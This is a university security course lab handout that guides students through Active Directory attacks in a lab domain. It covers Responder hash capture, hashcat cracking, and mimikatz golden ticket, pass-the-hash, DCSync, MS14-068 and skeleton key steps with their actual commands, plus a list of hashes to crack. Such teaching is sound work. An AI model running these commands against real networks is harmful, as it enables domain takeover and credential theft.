CSEC 388/488

 

NAME:____________________________________

 

Active Directory Attacks (Lab #5)

 

75 Points

Instructions: Read and complete the lab as stated (yes read the whole thing).  Submit all required screenshots and questions. Commands you need to run are highlighted in BLUE. Commands you need to replace are highlighted in PURPLE. Required screenshots are underlined in GREEN. You are only authorized to perform actions within the lab environment.  Under no circumstances are you allowed to probe, scan, ping, or send any data to any other targets then those listed in the lab.

Deliverables: You do not need to submit screenshots, unless specifically asked for.  All questions are numbered and bolded.  Submit in a SEPARATE word document with all questions, screenshots, and your full name to D2L. Note: You must also include any screenshots asked for as part of the lab.

Estimated Time: ~ 6-10 hours

Note: Plagiarism or cheating will result in a 0 for the assignment and potentially failure for the course.  Answers are expected to be written in a detailed, professional manner.  Answers should be submitted in a separate word (.docx) file. Failure to do any of the above will result in a point reduction.

 

Required Materials: Windows 2003, Windows 10

 

Net-NTLM cracking

1. Login to your Kali box and open a terminal.
2. Responder is a tool that will capture Net-NTLM hashes that we can attempt to crack offline. The syntax for the tool is responder -I 12.0.0/24_network. Run this command using the kali interface connected to the 10.12.0.0/24 network.
3. Note that NBT-NS (netbios name service) is set to poison the response. This is essentially kali pretending to be the requested service.
4. Now we will simulate capturing credenitals. Login to your Windows 10 box as the _{gibson\student}[your_student_#] user (password can be found in your password cracking steps from the last lab).

Note: this is NOT the adminStudent account

5. Run _cpl either from search or cmd.exe and disable the ethernet 1 interface (use .\student:CSEC388password credentials to achieve this).
6. Open an explorer window and attempt to connect to a fileshare name of your student number.

Note: Do NOT enter credentials when prompted.  The hash will be automatically sent to responder.

7. Return to the Kali You should see a captured NTLMv2 response. Take a complete screenshot of this response as well as the poisoned answer responded to including the entire hash. (an example of both are shown below)
8. Open a new terminal. Copy the hash (everything in orange on the NTLMv2-SSP line) to a file called _txt. Note: You can view all captured hashes at

/usr/share/responder/logs/

9. In the last lab, you used John and Cain to crack passwords. Now we are going to use a much more advanced password cracking tool, Hashcat.  Hashcat supports over 300 hash varieties for cracking, as well as the ability to utilize GPU cores, which is more efficient for cracking passwords.
10. Run the following to crack the password: hashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/wfuzz/general/medium.txt
11. You should see a status of cracked after a minute or so. Take a screenshot showing this status as well as the cracked password.

1) Include screenshots asked for above.  What type of hash did you crack?  Explain what options were used in the hashcat command used. (15 pts)

 

Golden Ticket

1. Login to your Windows 10 box as the gibson\student[your_student_#] user (pass: gibson).
2. Open up cmd (not admin, as the logged in user, student[your_student_#]).
3. Run _whomi to confirm you are running with user privileges. Attempt to visit the c$ share on the domain controller by

running ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$.  Take a screenshot showing the output of all the previous commands.  You should get an access denied message.  Why do you think that is?

4. Run _klist to view your current Kerberos tickets. Note that the expiration date for all tickets is 7 days.
5. We need to gather some information before we can run our attack. Run net group “domain admins” /domain and choose a target account to impersonate (choose the account matching your student #).  Then run _{whoami /user} and note the SID (minus the last 4 digits).  From lab #4 secretsdump output, locate the NTLM hash of the krbtgt account.
6. Open up a 2^nd cmd with the local admin account (student). Navigate to your x64 version of mimikatz.exe (C:\CSEC388-Tools) and run it from the cli or gui (shift right click to run as a different user).

Note: This does NOT mean to log out and log back in as student.  You should be logged in as your student# domain account, running the process cmd.exe as student.

 

 

7. Create a golden ticket using mimikatz and inject the golden ticket using pass the ticket. Take a screenshot of your command used and the output.
8. 1_. Command Example (this will not work as written):

kerberos::golden /admin:Bob /domain:c137.local /sid:S-1-1-12-

123456789-1234567890-123456789

/krbtgt:deadbeefboobbabe003133700009999

/ticket:Administrator.kiribi /ptt

i /admin = domain admin from step #4 ii /sid = SID from step #4 step 5 iii /krbtgt = krbtgt NTLM hash from lab 4 domain controller hashdump (secretsdump output)

8. Run kerberos::list to view your new ticket. Note that the end date is 10 years from now!  This can be a good sign of a forged krbtgt ticket.
9. Run _misc::cmd to open a cmd shell with are new ticket.
10. Run _klist to ensure you see your new ticket in your new command shell.
11. Run ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot. List the contents of the directory and take a screenshot.
12. Return to the cmd shell from step 1 (run as the account user) and run _klist. This will show your current Kerberos tickets.

2) Include screenshots asked for above.  Do you see your newly generated ticket from step 8 in step 10 and step 12? If not, why don’t you? Do you think it is a good idea to impersonate a member of the Domain Admins group? Why? (15 pts)

 

 

Pass the Hash

1. Reboot the windows 10 VM to clear out any existing

sessions. Logon with the _{gibson\student}[your_student_#] user.

Note: this is NOT the adminStudent account

 

2. Open up cmd and attempt to visit the c$ share on the domain controller by running ipconfig && date /t && time /t && whoami

&& pushd \\gibson2003ad\c$ to ensure that you no longer have access.   Take a screenshot.

3. We need to gather some information before we can run our attack. Locate the adminStudent NTLM hash from lab 4.
4. Open up a 2^nd cmd with the local admin account (student).

Navigate to your x64 version of mimikatz.exe and run it.

5. Pass the hash using mimikatz. Take a screenshot of the command used and output.
   1. Elevate privileges: privilege::debug
   2. Command Example (this will not work as written):

sekurlsa::pth /user:adminStudent[your_student_#] /domain:c137.local

/ntlm:cc126155b0b1b31a4fa2b55e2f0aa790

6. A new cmd shell will open automatically. Run ipconfig && date

/t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot.

 

3) Include screenshots asked for above.  Why do you think this attack works without a user password?

 (15 pts)

 

MS14-068

1. Reboot the windows 10 VM to clear out any existing sessions. Logon with the _student[your_studentc_#]
2. Open up cmd and attempt to visit the c$ share on the

domain controller by running ipconfig && date /t && time /t && whoami

&& pushd \\gibson2003ad\c$ to ensure that you no longer have access.   Take a screenshot.

3. We need to gather some information before we can run our attack. Find the student# domain account SID using commands from earlier in the lab.
4. Navigate to the CSEC388-Tools folder. Using cmd, run the ms14-068.exe. Fill in the options using the student user and other information you gathered.  This will modify our existing TGT to give us added permissions and save it to the local directory.  Take a screenshot of your command and the generated ticket file (the output of the command).

Note: You will need the full student# user SID.  You should also use domain names, not IP addresses.

5. We now need to use mimikatz to inject our fake ticket into memory. Navigate to your x64 version of mimikatz.exe and run it.
6. MS14-068 using mimikatz. Take a screenshot of your successful injection of the forged ticket.
   1. Clear old Kerberos tickets: kerberos::purge
   2. Inject ticket: kerberos::ptc path_to_.ccache
7. Run _misc::cmd to open a cmd shell with the new ticket.
8. Run ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot.

4) Include screenshots asked for above.  Consider the risk of this type of vulnerability against the other attacks performed in the lab.  Where would you rate this one and why?  (15 pts)

 

DCSync

1. Reboot the windows 10 VM to clear out any existing sessions. Logon with the student# domain user.
2. Open up CMD as a Domain Administrator (adminStudent[your_student_#]) (this is NOT student).

Navigate to your x64 version of mimikatz.exe and run it.

1. Elevate to a system level context by running token::elevate
2. Run the command _{lsadump::dcsync /user:administrator} and screenshot your command and results.

5) Include screenshots asked for above.  What is the output of the command?  How could this be useful.  (7.5 pts)

 

 

Skeleton Key

1. 1_. Research the skeleton key attack. Use mimikatz on your 2003 AD server to perform this attack. Login with the “skeleton key” on your windows 10 box. Take a screenshot showing the commands run in mimikatz as well as a screenshot of you running the following command from your Windows 10 box from the gibson\student# domain

account: whoami && net use y: \\gibson2003ad\c$ /user:GIBSON\adminStudent[your_student_#] your_skeleton_key_password && dir y:

Note: You will need to figure out how to get the mimikatz executable to the 2003 server.  You can login to the 2003 server and run mimikatz from there.

6) How does this attack work? (7.5 pts)

 

Bonus – Password Cracking

BONUS) Below are a list of various hash types.  Using any method you wish, attempt to crack them.  Provide the tools/commands used, as well as screenshot(s) showing the flags/options used as well as the cracked hashes (clear text password). Summarize the list of hashes:passwords you cracked as well.  Failure to provide this, results in no bonus points given.

0-4 hashes = 7.5 pts

5-9 hashes = 15 pts

10-14 hashes = 22.5 pts

15-19 = 45 pts

20 = 60 pts

Ex: 12 hashes gets you 22.5 points.

23B3EFCAA559D0DBAAD3B435B51404EE

7A21990FCD3D759941E45C490F143D5F

674B182EB361CCBDAAD3B435B51404EE

31D6CFE0D16AE931B73C59D7E0C089C0

174a4c22861829c9c2265b23734e0dac

4c3879fef394fa5dce0037c197c70841

AAD3B435B51404EEAAD3B435B51404EE

0D719285D17BE1AD7F674595BA10AB49

0ca2eb5ed25e3a459c5014ae4718a7ee DC56A7ECA67163D0C8574EC813FB485B b60d0b4991fa67cea233a2a85d4a681d 30F2A11DEEE826635CC97F19214C0953

7969f9a0da577b74a180aba111569fb0

A9A3FDA9A22F142474B72137B58B7124

$1$rmayH6pZ$TCGEW7GMPAMZaAj.Xa6lP0 $5$0UEq8/8/iF6tpdp$EY7.WmzwL8kC3t6VvxeYbmeWOzg FKT2DbbPEoxM8Zg.

$6$VgkKz.9tcfThuF9m$zOp8YkX5sJDgPTpG/P/vt2ulwCuh KM67AqIhRZmMPNSWfGlz692akPa/8NV3vE1gOlLm/dOf

uECiI9U187zqD/

$1$KIIP4v5t$Eg79.tkpCvIlrmS4aSUGP1

$5$yjC2.4sLjJc$73eJp8mxwX/ASZZfAUVeTWewaga9Z3YL Mw6GUVbr4i8

$6$2YF2grK5esw5F$bzFSuef0ep65zhlss7NMfag94hfCGCb

OW7bU1QzqsjzRKgQCPe804uL//So9IT03BPNGytx5iot62/4 ANoj6p1

 

 

Time to Complete Lab:

 

6

© 2018, Ryan Haley. All rights reserved.

AD Attacks Lab